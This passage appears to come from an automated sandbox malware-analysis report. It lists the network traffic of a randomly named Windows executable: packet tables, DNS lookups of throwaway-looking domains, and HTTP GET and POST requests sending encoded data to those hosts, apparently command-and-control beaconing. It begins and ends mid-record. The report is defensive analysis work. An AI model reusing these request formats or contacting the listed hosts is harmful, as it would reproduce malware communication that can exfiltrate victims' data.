                                                      Sep 25, 2024 05:38:18.218355894 CEST4977380192.168.2.43.33.130.190
                                                      Sep 25, 2024 05:38:18.223115921 CEST80497733.33.130.190192.168.2.4
                                                      Sep 25, 2024 05:38:23.263443947 CEST4977480192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:23.268358946 CEST804977415.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:23.271522045 CEST4977480192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:23.284563065 CEST4977480192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:23.289454937 CEST804977415.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:23.734728098 CEST804977415.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:23.734924078 CEST4977480192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:24.795578957 CEST4977480192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:24.800477028 CEST804977415.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:25.811180115 CEST4977580192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:25.816324949 CEST804977515.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:25.816406965 CEST4977580192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:25.831094027 CEST4977580192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:25.836352110 CEST804977515.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:26.296860933 CEST804977515.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:26.296931982 CEST4977580192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:27.340461969 CEST4977580192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:27.345310926 CEST804977515.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.357681036 CEST4977680192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:28.531470060 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.534668922 CEST4977680192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:28.546482086 CEST4977680192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:28.551284075 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.551310062 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.551325083 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.551367044 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.551379919 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.551400900 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.551474094 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.551529884 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:28.552752018 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:29.011455059 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:29.014611959 CEST4977680192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:30.057452917 CEST4977680192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:30.062251091 CEST804977615.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:31.078893900 CEST4977780192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:31.083781004 CEST804977715.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:31.087305069 CEST4977780192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:31.094681978 CEST4977780192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:31.099526882 CEST804977715.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:31.546632051 CEST804977715.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:31.546739101 CEST804977715.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:31.546814919 CEST4977780192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:31.550230980 CEST4977780192.168.2.415.197.204.56
                                                      Sep 25, 2024 05:38:31.555119038 CEST804977715.197.204.56192.168.2.4
                                                      Sep 25, 2024 05:38:36.964545965 CEST4977880192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:36.969423056 CEST8049778198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:36.975362062 CEST4977880192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:37.135612011 CEST4977880192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:37.344155073 CEST8049778198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:37.550028086 CEST8049778198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:37.550108910 CEST8049778198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:37.550174952 CEST4977880192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:38.635993004 CEST4977880192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:39.657847881 CEST4977980192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:39.663686991 CEST8049779198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:39.663764954 CEST4977980192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:39.686003923 CEST4977980192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:39.690850019 CEST8049779198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:40.237739086 CEST8049779198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:40.238029957 CEST8049779198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:40.238082886 CEST4977980192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:41.198154926 CEST4977980192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:42.216974974 CEST4978080192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:42.221882105 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.221981049 CEST4978080192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:42.233803988 CEST4978080192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:42.238976002 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239087105 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239097118 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239106894 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239116907 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239259005 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239268064 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239274979 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.239284992 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.801974058 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.802586079 CEST8049780198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:42.802639961 CEST4978080192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:43.744946003 CEST4978080192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:44.764573097 CEST4978180192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:44.769495964 CEST8049781198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:44.769841909 CEST4978180192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:44.779187918 CEST4978180192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:44.783922911 CEST8049781198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:45.354216099 CEST8049781198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:45.354877949 CEST8049781198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:45.355247021 CEST4978180192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:45.357378960 CEST4978180192.168.2.4198.252.106.191
                                                      Sep 25, 2024 05:38:45.363827944 CEST8049781198.252.106.191192.168.2.4
                                                      Sep 25, 2024 05:38:50.902256966 CEST4978280192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:50.907058954 CEST804978243.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:50.907155037 CEST4978280192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:50.918225050 CEST4978280192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:50.923075914 CEST804978243.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:52.432549000 CEST4978280192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:52.482815027 CEST804978243.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:53.451478958 CEST4978380192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:53.458370924 CEST804978343.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:53.458822966 CEST4978380192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:53.470298052 CEST4978380192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:53.476274967 CEST804978343.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:54.979830980 CEST4978380192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:55.026743889 CEST804978343.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:55.999000072 CEST4978480192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:56.004704952 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.004776001 CEST4978480192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:56.020057917 CEST4978480192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:56.024954081 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025008917 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025018930 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025027037 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025068998 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025079012 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025135994 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025145054 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:56.025181055 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:57.526324987 CEST4978480192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:57.574714899 CEST804978443.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:58.544915915 CEST4978580192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:58.549715996 CEST804978543.154.104.247192.168.2.4
                                                      Sep 25, 2024 05:38:58.549871922 CEST4978580192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:58.557384014 CEST4978580192.168.2.443.154.104.247
                                                      Sep 25, 2024 05:38:58.562194109 CEST804978543.154.104.247192.168.2.4

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 25, 2024 05:35:59.791604042 CEST6436153192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:35:59.920726061 CEST53643611.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:36:15.515980005 CEST6460453192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:36:16.386615992 CEST53646041.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:36:29.676322937 CEST6206653192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:36:29.849215031 CEST53620661.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:36:43.639635086 CEST5198053192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:36:43.827776909 CEST53519801.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:36:57.165522099 CEST5980853192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:36:57.223622084 CEST53598081.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:37:10.889569998 CEST5929053192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:37:11.239495039 CEST53592901.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:37:24.998491049 CEST4971853192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:37:25.392357111 CEST53497181.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:37:38.571176052 CEST5074253192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:37:38.993366003 CEST53507421.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:37:56.454458952 CEST6244353192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:37:56.465569973 CEST53624431.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:38:10.093355894 CEST5772953192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:38:10.106476068 CEST53577291.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:38:23.234899998 CEST5298053192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:38:23.256885052 CEST53529801.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:38:36.564459085 CEST5828553192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:38:36.939099073 CEST53582851.1.1.1192.168.2.4
                                                      Sep 25, 2024 05:38:50.373689890 CEST5516953192.168.2.41.1.1.1
                                                      Sep 25, 2024 05:38:50.899920940 CEST53551691.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 25, 2024 05:35:59.791604042 CEST192.168.2.41.1.1.10x156fStandard query (0)www.whats-in-the-box.orgA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:15.515980005 CEST192.168.2.41.1.1.10x1d17Standard query (0)www.1183377.appA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.676322937 CEST192.168.2.41.1.1.10xb7a8Standard query (0)www.52ywq.vipA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:43.639635086 CEST192.168.2.41.1.1.10xb75fStandard query (0)www.zenscape.topA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:57.165522099 CEST192.168.2.41.1.1.10x9b92Standard query (0)www.asociacia.onlineA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:10.889569998 CEST192.168.2.41.1.1.10x7c49Standard query (0)www.93187.xyzA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:24.998491049 CEST192.168.2.41.1.1.10xc1e3Standard query (0)www.insicilia.todayA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:38.571176052 CEST192.168.2.41.1.1.10x8c00Standard query (0)www.tempatmudisini01.clickA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:56.454458952 CEST192.168.2.41.1.1.10xcf7fStandard query (0)www.o731lh.vipA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:10.093355894 CEST192.168.2.41.1.1.10x8bdbStandard query (0)www.consultarfacil.onlineA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:23.234899998 CEST192.168.2.41.1.1.10xbfabStandard query (0)www.broomeorchard.xyzA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:36.564459085 CEST192.168.2.41.1.1.10xc736Standard query (0)www.suarahati20.xyzA (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:50.373689890 CEST192.168.2.41.1.1.10x216fStandard query (0)www.nmh6.siteA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 25, 2024 05:35:59.920726061 CEST1.1.1.1192.168.2.40x156fNo error (0)www.whats-in-the-box.orgwhats-in-the-box.orgCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:35:59.920726061 CEST1.1.1.1192.168.2.40x156fNo error (0)whats-in-the-box.org3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:35:59.920726061 CEST1.1.1.1192.168.2.40x156fNo error (0)whats-in-the-box.org15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)www.1183377.appr83l7k.asiagoogleantiddoscdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)r83l7k.asiagoogleantiddoscdn.comhse6978h2.g.asiagoogleantiddoscdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.27.173A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.27.171A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.85A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.84A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.3A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.225.60.99A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.225.60.59A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.37.78A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:16.386615992 CEST1.1.1.1192.168.2.40x1d17No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.37.76A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)www.52ywq.vip2rqff6.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)2rqff6.zxy-cname.comxzwp.g.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)xzwp.g.zxy-cname.com52.187.43.73A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)xzwp.g.zxy-cname.com13.76.137.44A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)xzwp.g.zxy-cname.com52.187.43.40A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)xzwp.g.zxy-cname.com52.230.28.86A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)xzwp.g.zxy-cname.com13.76.139.81A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:29.849215031 CEST1.1.1.1192.168.2.40xb7a8No error (0)xzwp.g.zxy-cname.com52.187.42.58A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:43.827776909 CEST1.1.1.1192.168.2.40xb75fNo error (0)www.zenscape.top199.192.21.169A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:36:57.223622084 CEST1.1.1.1192.168.2.40x9b92No error (0)www.asociacia.onlineasociacia.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:36:57.223622084 CEST1.1.1.1192.168.2.40x9b92No error (0)asociacia.online81.2.196.19A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:11.239495039 CEST1.1.1.1192.168.2.40x7c49No error (0)www.93187.xyz107.163.130.249A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:25.392357111 CEST1.1.1.1192.168.2.40xc1e3No error (0)www.insicilia.today52.223.13.41A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:38.993366003 CEST1.1.1.1192.168.2.40x8c00No error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:37:38.993366003 CEST1.1.1.1192.168.2.40x8c00No error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:56.465569973 CEST1.1.1.1192.168.2.40xcf7fNo error (0)www.o731lh.vipo731lh.vipCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:37:56.465569973 CEST1.1.1.1192.168.2.40xcf7fNo error (0)o731lh.vip3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:37:56.465569973 CEST1.1.1.1192.168.2.40xcf7fNo error (0)o731lh.vip15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:10.106476068 CEST1.1.1.1192.168.2.40x8bdbNo error (0)www.consultarfacil.onlineconsultarfacil.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:38:10.106476068 CEST1.1.1.1192.168.2.40x8bdbNo error (0)consultarfacil.online3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:10.106476068 CEST1.1.1.1192.168.2.40x8bdbNo error (0)consultarfacil.online15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:23.256885052 CEST1.1.1.1192.168.2.40xbfabNo error (0)www.broomeorchard.xyz15.197.204.56A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:23.256885052 CEST1.1.1.1192.168.2.40xbfabNo error (0)www.broomeorchard.xyz3.33.243.145A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:36.939099073 CEST1.1.1.1192.168.2.40xc736No error (0)www.suarahati20.xyzsuarahati20.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Sep 25, 2024 05:38:36.939099073 CEST1.1.1.1192.168.2.40xc736No error (0)suarahati20.xyz198.252.106.191A (IP address)IN (0x0001)false
                                                      Sep 25, 2024 05:38:50.899920940 CEST1.1.1.1192.168.2.40x216fNo error (0)www.nmh6.site43.154.104.247A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.whats-in-the-box.org
                                                      • www.1183377.app
                                                      • www.52ywq.vip
                                                      • www.zenscape.top
                                                      • www.asociacia.online
                                                      • www.93187.xyz
                                                      • www.insicilia.today
                                                      • www.tempatmudisini01.click
                                                      • www.o731lh.vip
                                                      • www.consultarfacil.online
                                                      • www.broomeorchard.xyz
                                                      • www.suarahati20.xyz
                                                      • www.nmh6.site

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.4497373.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:35:59.952097893 CEST478OUTGET /i7xp/?Vvn=XtJLE6KXyHJ010P&N0spilI0=1hYOXgym/+H9levHoL4uDmSoKaP5f04LAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+ByycC+m3CBgf9UgTY0pVgzUvtxB6m49SfQluc= HTTP/1.1
                                                      Host: www.whats-in-the-box.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:36:00.465517044 CEST404INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:36:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 26 4e 30 73 70 69 6c 49 30 3d 31 68 59 4f 58 67 79 6d 2f 2b 48 39 6c 65 76 48 6f 4c 34 75 44 6d 53 6f 4b 61 50 35 66 30 34 4c 41 75 42 45 50 53 46 6d 4e 42 57 57 31 55 6f 42 47 6d 37 6b 72 4d 61 6b 6f 49 66 32 54 38 50 43 62 61 6b 47 6b 35 63 4a 59 73 4b 39 49 7a 39 30 66 2b 42 79 79 63 43 2b 6d 33 43 42 67 66 39 55 67 54 59 30 70 56 67 7a 55 76 74 78 42 36 6d 34 39 53 66 51 6c 75 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vvn=XtJLE6KXyHJ010P&N0spilI0=1hYOXgym/+H9levHoL4uDmSoKaP5f04LAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+ByycC+m3CBgf9UgTY0pVgzUvtxB6m49SfQluc="}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.44973823.224.27.17380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:16.405566931 CEST727OUTPOST /8z5k/ HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.1183377.app
                                                      Referer: http://www.1183377.app/8z5k/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 72 2b 34 33 68 4f 5a 54 39 46 6d 68 35 33 41 64 48 38 6d 51 6b 64 75 67 41 4e 49 5a 7a 58 52 62 4a 55 66 55 5a 46 6c 49 45 4b 64 32 61 43 38 68 6c 46 42 2f 76 53 65 57 63 78 32 30 58 44 43 36 6e 63 70 6e 45 78 61 65 5a 78 57 33 67 57 4a 71 6d 42 36 57 75 4f 78 73 72 36 55 55 56 30 37 6b 53 2b 56 68 64 5a 6e 47 31 43 6f 42 35 50 61 72 6f 79 78 48 46 4d 51 58 4e 41 2f 6a 62 5a 78 4b 43 39 72 6e 50 49 72 6a 37 6d 35 61 37 67 45 63 45 4f 68 75 37 4b 6e 43 50 4a 44 2f 65 7a 63 43 70 47 6f 68 32 39 31 6c 6a 67 66 64 6a 42 77 5a 49 37 58 6e 5a 67 3d 3d
                                                      Data Ascii: N0spilI0=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu7KnCPJD/ezcCpGoh291ljgfdjBwZI7XnZg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.44973923.224.27.17380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:18.960832119 CEST747OUTPOST /8z5k/ HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.1183377.app
                                                      Referer: http://www.1183377.app/8z5k/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
